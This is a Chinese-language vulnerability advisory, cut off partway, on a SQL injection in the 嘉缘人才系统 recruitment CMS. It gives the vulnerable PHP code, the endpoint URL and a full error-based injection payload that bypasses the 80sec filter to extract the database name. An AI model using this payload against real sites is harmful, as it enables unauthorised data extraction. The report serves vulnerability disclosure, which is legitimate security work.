嘉缘人才系统最新版注入(无视防御)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt ### 详细说明: 看到\member\person_interview.php ``` if($do=='del'){ $checks=$_POST['checks']; $db ->query("delete from {$cfg['tb_pre']}myinterview where i_pmember='$username' and i_id in ($checks)"); showmsg('删除成功!',"?m=person_interview&show=$show",0,2000);exit(); ``` 由上面的代码可以看出来,$checks直接进入了sql中,而且没有单引号。 但是,这个cms内置了一个80sec的过滤脚本。当然,网上对其的绕过有很详细的方法。 ``` http://127.0.0.1/frcms/member/index.php?m=person_interview&do=del ``` 然后在POST提交数据。 ``` checks=1) and char(@`'`) or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) %23`'` ``` 但是,这样是直接没有回显的,因为它会把sql错误信息写入一个log里面。 这个log文件的命名,可以看到以下代码。 ``` function log_write($message, $type = 'php') { global $cfg, $fr_time, $username; $userip = getip(); $fr_time or $fr_time = time(); $user = $username ? $username : 'guest'; dir_create(DATA_ROOT.'/log/'); $log_file =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息